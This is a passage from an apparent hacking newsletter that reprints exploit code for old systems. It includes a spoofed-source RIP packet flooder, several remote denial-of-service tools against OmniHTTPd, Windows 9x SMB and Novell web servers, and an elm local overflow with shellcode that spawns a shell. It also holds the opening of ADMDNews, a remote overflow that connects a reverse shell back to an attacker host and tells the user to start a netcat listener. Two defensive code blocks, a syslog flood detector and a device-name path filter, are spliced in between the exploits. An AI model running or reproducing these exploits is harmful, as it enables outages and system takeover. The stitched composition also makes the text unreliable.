#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <protocols/routed.h>
#include <linux/route.h>
#include <arpa/inet.h>
/* i think i took this line from a syn flooder.. */
#define ranipbit(a, b) ((rand() % (((b) + 1) - (a))) + (a))
u_short chksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 1;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int dolphin (int sock, struct sockaddr_in *sin, char *rp, int sizerp, u_long source, u_long victim)
{
struct udphdr udp;
struct iphdr ip;
char packet[8092];
int ret;
ip.id = htons(31337 + (rand() % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.ihl = 5;
ip.version = 4;
ip.tos = 0;
ip.tot_len = htons(28 + sizerp);
ip.saddr = source;
ip.daddr = victim;
ip.check = chksum((u_short *) &ip, sizeof(ip));
udp.source = htons(520);
udp.dest = htons(520);
udp.len = htons(8 + sizerp);
udp.check = 0;
memcpy(packet, (char *) &ip, sizeof(ip));
memcpy(packet + sizeof(ip), (char *) &udp, sizeof(udp));
memcpy(packet + sizeof(ip) + sizeof(udp), (char *) rp, sizerp);
ret = sendto(sock, packet, sizeof(ip) + sizeof(udp) + sizerp, 0,
(struct sockaddr *) sin, sizeof(struct sockaddr_in));
return ret;
}
int main(int argc, char **argv)
{
u_long victim, stop = 0, srcaddr, udelay = 100;
int sock, dos = 1, riptype = 1;
struct sockaddr_in sin;
struct rip rp;
struct netinfo *neti = rp.rip_nets;
struct hostent *hp;
if (argc < 4) {
fprintf(stderr, "routesex.c by xt of XOR\n");
fprintf(stderr, "usage: %s <victim> <usleep> <time [put '0' for continuous]>\n", argv[0]);
return 0;
}
udelay = atol(argv[2]);
if (!udelay)
udelay = 100;
stop = atol(argv[3]);
if (!stop)
stop = 0;
else
stop += time(0);
if ((hp = gethostbyname(argv[1])) == NULL) {
perror("gethostbyname");
return -1;
} else
bcopy(*hp->h_addr_list, &victim, sizeof(hp->h_addr_list));
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
perror("socket");
return -1;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(520);
sin.sin_addr.s_addr = victim;
rp.rip_vers = RIPVERSION;
neti->rip_dst.sa_family = htons(AF_INET);
memcpy(rp.rip_nets, neti, sizeof(neti));
printf("RIP'ing %s!\n", argv[1]);
while (dos) {
int a, b, c, d;
char buffer[32];
a = ranipbit(0, 255);
b = ranipbit(0, 255);
c = ranipbit(0, 255);
d = ranipbit(0, 255);
rp.rip_cmd = riptype;
neti->rip_metric = htonl(riptype);
if (riptype == 4)
riptype = 1;
snprintf(buffer, 32, "%d.%d.%d.%d", a, b, c, d);
srcaddr = inet_addr(buffer);
if ((dolphin(sock, &sin, (char *) &rp, sizeof(rp), srcaddr, victim)) == -1) {
perror("sendto");
return -1;
}
riptype++;
usleep(udelay);
if (!stop) {
if (time(0) == stop)
dos = 0;
}
}
printf("Finished.\n");
close(sock);
return 0;
}
/* www.hack.co.za [10 May]*/
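The author's description gives the log signature a defender can key on: syslog collapses repeats from one source into "last message repeated X times", while randomly spoofed sources each produce their own "packet from unknown router" line. This added example (not part of the original listing) scans syslog lines for that pattern and separates a spoofed flood from a single misconfigured neighbour; the sample lines are constructed, and the function names and the 80% distinct-source threshold are assumptions to tune per site.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MARKER   "packet from unknown router, "
#define REPEATED "last message repeated "
#define MAX_SRC  4096
#define NELEM(a) (sizeof(a) / sizeof((a)[0]))

struct rip_log_stats {
    size_t messages;   /* routed "unknown router" events, repeats included */
    size_t distinct;   /* distinct source addresses among them */
};

/* Extract the source address from one syslog line; returns 1 on a match. */
static int parse_unknown_router(const char *line, struct in_addr *src)
{
    char ip[INET_ADDRSTRLEN];
    const char *p;
    size_t n;

    if (!strstr(line, "routed[") || !(p = strstr(line, MARKER))) return 0;
    p += strlen(MARKER);
    n = strspn(p, "0123456789.");
    if (n == 0 || n >= sizeof ip) return 0;
    memcpy(ip, p, n);
    ip[n] = '\0';
    return inet_pton(AF_INET, ip, src) == 1;
}

struct rip_log_stats scan_routed_log(const char *const *lines, size_t n)
{
    static in_addr_t seen[MAX_SRC];
    struct rip_log_stats st = { 0, 0 };
    int prev_was_rip = 0;
    size_t i, j;

    for (i = 0; i < n; i++) {
        struct in_addr a;
        unsigned int rep;
        const char *r = strstr(lines[i], REPEATED);

        /* A repeat marker counts only if it follows a routed event. */
        if (r && sscanf(r, REPEATED "%u times", &rep) == 1) {
            if (prev_was_rip) st.messages += rep;
            continue;
        }
        prev_was_rip = parse_unknown_router(lines[i], &a);
        if (!prev_was_rip) continue;
        st.messages++;
        for (j = 0; j < st.distinct && seen[j] != a.s_addr; j++)
            ;
        if (j == st.distinct && st.distinct < MAX_SRC)
            seen[st.distinct++] = a.s_addr;
    }
    return st;
}

/* Flood heuristic: enough events, and at least 80% of them (assumed
 * threshold) come from sources never seen before in the window. */
int is_spoofed_flood(struct rip_log_stats st, size_t min_messages)
{
    return st.messages >= min_messages &&
           st.distinct * 10 >= st.messages * 8;
}

/* Constructed sample: many events, every source different. */
static const char *const FLOOD_SAMPLE[] = {
    "May  7 03:10:01 gw routed[3067]: packet from unknown router, 45.138.23.14",
    "May  7 03:10:01 gw routed[3067]: packet from unknown router, 198.51.100.7",
    "May  7 03:10:01 gw routed[3067]: packet from unknown router, 203.0.113.99",
    "May  7 03:10:01 gw sshd[411]: Accepted password for ops from 10.0.0.5",
    "May  7 03:10:02 gw routed[3067]: packet from unknown router, 192.0.2.45",
    "May  7 03:10:02 gw routed[3067]: packet from unknown router, 100.64.12.8",
    "May  7 03:10:02 gw routed[3067]: packet from unknown router, 172.31.200.3",
};

/* Constructed sample: one neighbour, collapsed by syslog. */
static const char *const NEIGHBOUR_SAMPLE[] = {
    "May  7 04:00:00 gw routed[3067]: packet from unknown router, 10.0.0.254",
    "May  7 04:00:30 gw last message repeated 40 times",
    "May  7 04:01:00 gw routed[3067]: packet from unknown router, 10.0.0.254",
};

int main(void)
{
    struct rip_log_stats f = scan_routed_log(FLOOD_SAMPLE, NELEM(FLOOD_SAMPLE));
    struct rip_log_stats q = scan_routed_log(NEIGHBOUR_SAMPLE, NELEM(NEIGHBOUR_SAMPLE));

    printf("flood sample:     %zu events, %zu sources, alert=%d\n",
           f.messages, f.distinct, is_spoofed_flood(f, 5));
    printf("neighbour sample: %zu events, %zu sources, alert=%d\n",
           q.messages, q.distinct, is_spoofed_flood(q, 5));
    return 0;
}
```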
@HWA
269.0 [IND] omni-httpd.sh win98 remote dos attack by sirius.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://b0f.freebsd.lublin.pl
#!/bin/sh
#
# Vulnerable versions:
# Omni Httpd pro v.2.06 Win98 (NT not tested)
#
# The problem:
# It is possible to crash the remote system because
# OmniHttpD (version: Pro. v2.06, maybe others)
# parses the path strings to call some FAT32/VFAT
# routines in the kernel, which makes your system
# unstable and useless until the next reboot.
#
# Fix:
# Unknown for now. I mailed Omnicron Technologies;
# they will probably fix this bug in the next version.
#
# About:
# Discovered by: sirius from b0f
# Coded by: sirius from buffer0vefl0w security (b0f)
# [http://b0f.freebsd.lublin.pl]
if [ "$1" = "" ]; then
echo "OmniHTTPd v.2.06 DoS attack"
echo
echo "Coded: sirius from buffer0vefl0w security (b0f)"
echo "[http://b0f.freebsd.lublin.pl]"
echo
echo "Usage: $0 <host> <port>"
echo
exit 1
fi
echo "Launching attack ... please wait "
# this will crash some devices, but if modem is on comX the code after line with comX will not
# be executed ... you can change the order of execution ;)
(echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
# the following code will crash/freeze/make system busy/how to call it? system
(echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
(echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null
echo "Crash code send ..."
killall -9 telnet 2>/dev/null 1> /dev/null
echo "Done!"
# www.hack.co.za [10 May]#
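The requests in the script above all name DOS device files (lpt1, com1, aux, con) where the server expects a document path. This added example (not part of the original script and not OmniHTTPd code) is a request-path check that a server or front-end filter on a Windows 9x host could apply before touching the file system; it goes beyond the names in the script by also covering PRN, NUL, CLOCK$, the remaining COM/LPT numbers and names with an extension. The function names are hypothetical, and the path is assumed to be percent-decoded already.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Reserved device names on DOS/Windows 9x. A path segment whose base name
 * equals one of these, in any case and with or without an extension, is
 * opened as a device rather than as a file. */
static const char *const RESERVED[] = { "CON", "PRN", "AUX", "NUL", "CLOCK$" };

/* Case-insensitive compare of the first n bytes of a with upper-case b. */
static int ieq_n(const char *a, size_t n, const char *b)
{
    size_t i;

    if (strlen(b) != n) return 0;
    for (i = 0; i < n; i++)
        if (toupper((unsigned char)a[i]) != b[i]) return 0;
    return 1;
}

/* Returns 1 if the segment [seg, seg+len) names a reserved device. */
static int segment_is_device(const char *seg, size_t len)
{
    size_t base = 0, i;

    /* The base name ends at the first '.', so "aux.htm" is still AUX. */
    while (base < len && seg[base] != '.') base++;
    /* Trailing spaces are dropped when the name is resolved. */
    while (base > 0 && seg[base - 1] == ' ') base--;

    for (i = 0; i < sizeof(RESERVED) / sizeof(RESERVED[0]); i++)
        if (ieq_n(seg, base, RESERVED[i])) return 1;

    /* COM1..COM9 and LPT1..LPT9 */
    if (base == 4 && seg[3] >= '1' && seg[3] <= '9' &&
        (ieq_n(seg, 3, "COM") || ieq_n(seg, 3, "LPT")))
        return 1;
    return 0;
}

/* Returns 1 if any segment of a decoded request path is a device name.
 * Both '/' and '\\' separate segments; the query string is not a file
 * name and is ignored. */
int path_has_device_segment(const char *path)
{
    const char *p = path;

    while (*p) {
        const char *start;

        while (*p == '/' || *p == '\\') p++;
        start = p;
        while (*p && *p != '/' && *p != '\\' && *p != '?') p++;
        if (p > start && segment_is_device(start, (size_t)(p - start)))
            return 1;
        if (*p == '?') break;
    }
    return 0;
}

int main(void)
{
    /* Constructed request paths; the device ones mirror the script above. */
    static const char *const samples[] = {
        "/index.html", "/lpt1", "/con/con", "/docs/Aux.htm", "/com10"
    };
    size_t i;

    for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("%-16s %s\n", samples[i],
               path_has_device_segment(samples[i]) ? "reject" : "allow");
    return 0;
}
```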
@HWA
270.0 [IND] RFParalyze.c win(95/98) remote dos attack by rfp.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
rfp@wiretrip.net
/************************* www.el8.org **** www.wiretrip.net */
/* - el8.org advisory: RFParalyze.c
code by rain forest puppy <rfp@wiretrip.net> -
coolness exhibited by Evan Brewer <dm@el8.org> -
- Usage: RFParalyze <IP address> <NetBIOS name>
where <IP address> is the IP address (duh) of the target (note:
not DNS name). <NetBIOS name> is the NetBIOS name (again, duh)
of the server at the IP address given. A kiddie worth his
scripts should be able to figure out how to lookup the NetBIOS
name. Note: NetBIOS name must be in upper case.
This code was made from a reverse-engineer of 'whisper', a
binary-only exploit found in the wild.
I have only tested this code on Linux. Hey, at least it's
not in perl... ;) -rfp
Microsoft Windows 98
Microsoft Windows 95
*/
#include <stdio.h> /* It's such a shame to waste */
#include <stdlib.h> /* this usable space. Instead, */
#include <string.h> /* we'll just make it more */
#include <netdb.h> /* props to the men and women */
#include <sys/socket.h> /* (hi Tabi!) of #!adm and */
#include <sys/types.h> /* #!w00w00, because they rock */
#include <netinet/in.h> /* so much. And we can't forget*/
#include <unistd.h> /* our friends at eEye or */
#include <string.h> /* Attrition. Oh, +hi Sioda. :) */
/* Magic winpopup message
This is from \\Beav\beavis and says "yeh yeh"
Ron and Marty should like the hardcoded values this has ;)
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";
struct sreq /* little structure of netbios session request */
{
char first[5];
char yoname[32];
char sep[2];
char myname[32];
char end[1];
};
void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/
int main(int argc, char *argv[]){
char buf[4000], myname[33], yoname[33];
struct sockaddr_in sin;
int sox, connex, x;
struct sreq smbreq;
printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");
if (argc < 3) {
printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
printf(" --IP must be ip address, not dns\n");
printf(" --NetBIOS name must be in UPPER CASE\n\n");
exit(1);}
printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");
Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
myname[30]='A'; /* how was Beltaine? :) */
myname[31]='D';
Pad_Name(argv[2],yoname);
yoname[30]='A';
yoname[31]='D';
printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family = AF_INET;
sin.sin_port = htons(139);
sox = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
perror("Problems connecting: ");
exit(1);}
memset(buf,0,4000);
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/
memcpy(smbreq.end,"\x00",1); /*what it does :) */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yoname,yoname,32);
write(sox,&smbreq,72); /* send initial request */
x=read(sox,buf,4000); /* get their response */
if(x<1){ printf("Problem, didn't get response\n");
exit(1);}
if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
else {printf("We didn't get back the A-OK, bailing.\n");
exit(1);}
write(sox,&blowup,72); /* send the magic message >:) */
x=read(sox,buf,4000); /* we really don't care, but sure */
close(sox);
printf("done\n");
}
void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
int i, len;
len = strlen(name1);
for (i = 0; i < 16; i++) {
if (i >= len) {
c1 = 'C'; c2 = 'A'; /* CA is a space */
} else {
c = name1[i];
c1 = (char)((int)c/16 + (int)'A');
c2 = (char)((int)c%16 + (int)'A');
}
name2[i*2] = c1;
name2[i*2+1] = c2;
}
name2[32] = 0; /* Put in the null ...*/
}
/******************** www.el8.org *** www.wiretrip.net */
/* www.hack.co.za [10 May]*/
@HWA
271.0 [IND] www.c novell (4.11/4.1) remote dos attack by venglin.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
venglin@lagoon.freebsd.org.pl
/******************************************************************************
Novell NetWare webservers remote denial of service
<venglin@lagoon.freebsd.org.pl>
*******************************************************************************
Tested on:
- Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1:
Webserver stops responding to requests for a few minutes.
- Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1:
Whole system crash [page fault?].
*******************************************************************************
Usage:
./www <vulnerable_host> <http_port> <how_many_connections> <string_length>
Example:
./www copernicus.9lo.lublin.pl 80 10 10000
******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>
#define GET "GET"
#define PAT1 "/"
#define PAT2 "a/"
#define PAT3 "../"
#define PAT4 "./"
long getip(char *name)
{
struct hostent *hp;
long ip;
if ((ip=inet_addr(name))==-1)
{
if ((hp=gethostbyname(name))==NULL)
{
(void)fprintf(stderr, "gethostbyname failed.\n");
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int main (argc, argv)
int argc;
char **argv;
{
struct sockaddr_in cli;
int sockfd, i, x, len;
char *msg1, *msg2, *msg3, *msg4;
if (argc < 5) {
(void)fprintf(stderr, "usage: %s <host> <port> <connections> <len>\n", argv[0]);
exit(0);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(argv[1]);
cli.sin_port = htons(atoi(argv[2]));
len = atoi(argv[4]);
if (len < (sizeof(GET)+1+sizeof(PAT1))) {
(void)fprintf(stderr, "len too small.\n");
exit(1);
}
msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
sprintf(msg1, "%s %s", GET, PAT1);
sprintf(msg2, "%s %s", GET, PAT1);
sprintf(msg3, "%s %s", GET, PAT1);
sprintf(msg4, "%s %s", GET, PAT1);
for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);
for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg1, strlen(msg1));
close(sockfd);
free(msg1);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg2, strlen(msg2));
close(sockfd);
free(msg2);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg3, strlen(msg3));
close(sockfd);
free(msg3);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg4, strlen(msg4));
close(sockfd);
free(msg4);
exit(0);
}
waitpid(x,&i,0);
exit(0);
}
@HWA
272.0 [IND] elm-smash.c slackware 4.0 local overflow by Scrippie.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://b0f.freebsd.lublin.pl
/*
Elm Exploit - Scrippie - #Phreak.nl - b0f - http://b0f.freebsd.lublin.pl
This exploit spawns an EGID mail shell on the default Slackware 4 install.
Use as: elm-smash [mail-gid] [offset]
Not that EGID=mail has got any use, but hey, think of it as group
elevation :)
Take care and till next time!
*/
#include <stdio.h>
#define NUMNOPS 193 // If you change this, you gonna have to change
// the entire sploit ;)
// Shellcode does: setgid(12); execve("/bin/sh");
char shellcode[]="\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76"
"\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68";
// Oh no! Where the fuck is my code on the stack?
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
// Thanx for telling me lad :)
main(int argc, char **argv)
{
int i, offset=-300; // Offset works for my box
char gid=12;
long addy;
char *thaCode;
char *mailGid;
if(argc > 1) {
gid = (char) atoi(argv[1]);
mailGid = (char *)strchr(shellcode, 0x0c);
*mailGid = gid;
}
if(argc > 2) offset = atoi(argv[2]);
if(!(thaCode = (char *) malloc(NUMNOPS+sizeof(shellcode)+5))) {
fprintf(stderr, "Contact your admin and tell him to buy more RAM\n");
exit(-1);
}
addy = get_sp() - offset;
printf("/-----------------------------------------------\\\n");
printf("| Slack 4/Elm exploit - Scrippie |\n");
printf("\\-----------------------------------------------/\n");
printf("Assuming sgid(elm) = %d\n", (int) gid);
printf("Using ret addr = %x\n", addy);
printf("You're now EUID=mail, take care :-p\n");
printf("Please run \"reset\" when this works\n");
sleep(4);
memset(thaCode, 0x90, NUMNOPS);
thaCode[NUMNOPS] = 0x00; // Set to NULL to make strcat() work
strcat(thaCode, shellcode);
memcpy(thaCode + strlen(thaCode), (void *) &addy, 4);
setenv("MAIL", thaCode, 1); // We're going to be nasty now :)
if((execl("/usr/bin/elm", "/usr/bin/elm", NULL)) == -1) {
perror("execl()");
exit(-1);
}
exit(0);
}
@HWA
273.0 [IND] ADMDNews.zip win(nt/2k) remote overflow by ADM.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/win/2k/ADMDNews.zip
/**
*** ADM PRIVATE DO NOT DISTRIBUTE #@#!*&@#!
***
***
***
*** ADMDNews_v2 - WinNT/Win2K x86 exploit for NetWin (www.netwinsite.com)
*** DNews server (v5.0f - v5.3e3) gupcgi.exe/dnewsweb.exe CGIs.
***
*** This program exploits the buffer overflow condition in gupcgi.exe/dnewsweb.exe CGIs
*** while processing the "cmd" parameter. Credit for discovering this vulnerability goes to
*** plaguez <ndubee@df.ru> (j3w k1ck 4ss br0!!) :>
***
*** Tested and confirmed under WinNT 4.0 SP5/SP6 & Win2K Beta 3 RC2 (build 2128)
***
*** Usage: ADMDNews <victimHost> <victimPort> <victimPath> <evilHost> <evilPort> <DNewsVersion>
***
*** First setup netcat on <evilHost> to listen on <evilPort>
***
*** Ex: nc -l -p <evilPort> -v -v
***
*** Then run the exploit against <victimHost> web server on <victimPort> where
*** <victimPath> is the path of the vulnerable CGI. <DNewsVersion> is set
*** according to the version of the DNews server package you are exploiting. Please
*** look in program usage information for the codes corresponding to each
*** version.
***
*** THIS CODE IS ONLY FOR EDUCATIONAL PURPOSES. USE ONLY IN AN ETHICAL MANNER.
***
***
***
*** 1st March 2000
***
*** Joey__ <youcan_reachme@hotmail.com>
**/
#include <windows.h>
#include <stdio.h>
/*
Win9x tables
static unsigned int TableESP[1] = {0x636934};
static unsigned int TableFillSize[1] = {2004-1259};
static unsigned int TableWritableAddr[1] = {0x412000};
*/
/*
WinNT 4.0 tables
*/
static unsigned int TableESP[7] = {0x00116abc,
0x0012f2ec,
0x0012f2f0,
0x0012f2f0,
0x0012f2e8,
0x0012f2e8,
0x0012f2ec
};
static unsigned int TableFillSize[7] = {2004,
2000,
2000,
2000,
2000,
2000,
2000
};
static unsigned int TableWritableAddr[7] = {0x00412000,
0x00444000,
0x0043e000,
0x0043e000,
0x00441000,
0x00441000,
0x00444000
};
void print_banner()
{
printf ("ADMDNews - ADM PRIVATE DO NOT DISTRIBUTE #@#!*&@#!\n");
printf ("(c) 2000, Joey__ <youcan_reachme@hotmail.com>\n");
printf ("gr33tz - theowl,__ice,antilove,plaguez,horizon,xaphan,neonsurge,instd,duke_,stran9er,freeLSD,DiGit,ktwo,klog,cheez,rfp,acpizer\n\n");
}
void print_versions()
{
printf("\nVersions\n");
printf("0 - gupcgi.exe v5.0f - v5.3e3\n");
printf("1 - dnewsweb.exe v5.3d5\n");
printf("2 - dnewsweb.exe v5.0f\n");
printf("3 - dnewsweb.exe v5.0j2\n");
printf("4 - dnewsweb.exe v5.2b2\n");
printf("5 - dnewsweb.exe v5.2b3\n");
printf("6 - dnewsweb.exe v5.3e3\n");
}
void encodeHex(char* &pszTarget, int iByte)
{
*pszTarget++ = '%';
sprintf(pszTarget, "%02X", iByte & 0xff);
pszTarget+=2;
}
bool resolve (SOCKADDR_IN &anAddr, char* host, char*port)
{
HOSTENT hse;
HOSTENT *he = &hse;
unsigned long addr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(atoi(port));
if (INADDR_NONE == (addr = inet_addr(host)))
{
if(NULL == (he = gethostbyname(host)))
return (false);
anAddr.sin_addr.S_un.S_addr = *((unsigned long *)(he->h_addr_list[0]));
}
else
anAddr.sin_addr.S_un.S_addr = addr;
return(true);
}
void main(int argc, char* argv[])
{
char* pszReq = "GET %s?cmd=%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n";
char szReqBuf[65536];
char szFillBuf[65536];
char szESPBuf[64];
char szShellCodeBuf[65536];
char* pszFill = NULL;
char* pszESP = NULL;
char* pszShellCode = NULL;
unsigned int iFillSize,iESP,iWritableAddr;
FILE* fSploit;
unsigned int iSploitSize;
char* pSploitBuf;
WSADATA wsaData;
SOCKADDR_IN victimAddr;
SOCKADDR_IN evilAddr;
SOCKET s;
unsigned int i, iVer;
print_banner();
if (argc < 7)
{
printf("Usage: %s <victimHost> <victimPort> <victimPath> <evilHost> <evilPort> <DNewsVersion>\n", argv[0] );
print_versions();
exit(1);
}
char *victimHost = argv[1];
char *victimPort = argv[2];
char *victimPath = argv[3];
char *evilHost = argv[4];
char *evilPort = argv[5];
char *dnewsVersion = argv[6];
if (NULL == (fSploit = fopen ( "reverse-shell-v1", "rb")))
{
printf ("wh0 fux0r3d d4 spl01t c0d3?\n");
exit(2);
}
fseek(fSploit, 0, SEEK_END);
iSploitSize = ftell (fSploit);
fseek(fSploit, 0, SEEK_SET);
pSploitBuf = (char *)malloc(iSploitSize);
fread(pSploitBuf,1,iSploitSize,fSploit);
fclose(fSploit);
iVer = atoi(dnewsVersion);
iWritableAddr = TableWritableAddr[iVer];
iFillSize = TableFillSize[iVer] - iSploitSize;
iESP = TableESP[iVer];
pszESP = szESPBuf;
encodeHex (pszESP,((byte*)(&iESP))[0]);
encodeHex (pszESP,((byte*)(&iESP))[1]);
encodeHex (pszESP,((byte*)(&iESP))[2]);
encodeHex (pszESP,((byte*)(&iESP))[3]);
*pszESP = 0x00;
pszESP = szESPBuf;
pszFill = szFillBuf;
for (i=0;i<iFillSize;i++)
*pszFill++ = 'A';
*pszFill =0x00;
pszFill = szFillBuf;
const WORD wMinVer = 0x0101;
if( 0 != WSAStartup( wMinVer, &wsaData ) )
{
printf ("n0 w1nz00k3!\n");
exit(3);
}
if (!(resolve(victimAddr,victimHost,victimPort)))
{
WSACleanup();
printf ("fux0r3d v1ct1m h0st/p0rt!\n");
exit(4);
}
if (!(resolve(evilAddr,evilHost,evilPort)))
{
WSACleanup();
printf ("fux0r3d 3v1l h0st/p0rt!\n");
exit(5);
}
*((DWORD *)(pSploitBuf+0x2f)) = iWritableAddr;
*((DWORD *)(pSploitBuf+0x38e)) = evilAddr.sin_addr.S_un.S_addr;
*((WORD *)(pSploitBuf+0x38c)) = evilAddr.sin_port;
pszShellCode = szShellCodeBuf;
for (i=0;i<iSploitSize;i++) {
if (iVer)
{
switch (pSploitBuf[i]) {
case 0:
case 1:
case 2:
case 3:
case 4:
case 5:
case 6:
case 7:
case 8:
case 9:
case 10:
case 11:
case 12:
case 13:
case 14:
case 15:
case 16:
case 17:
case 18:
case 19:
case 20:
case 21:
case 22:
case 23:
case 24:
case 25:
case 26:
case 27:
case 28:
case 29:
case 30:
case 31:
case '-':
case '%':
case '~':
case '+':
case '<':
case '>':
case '&':
case '^':
case '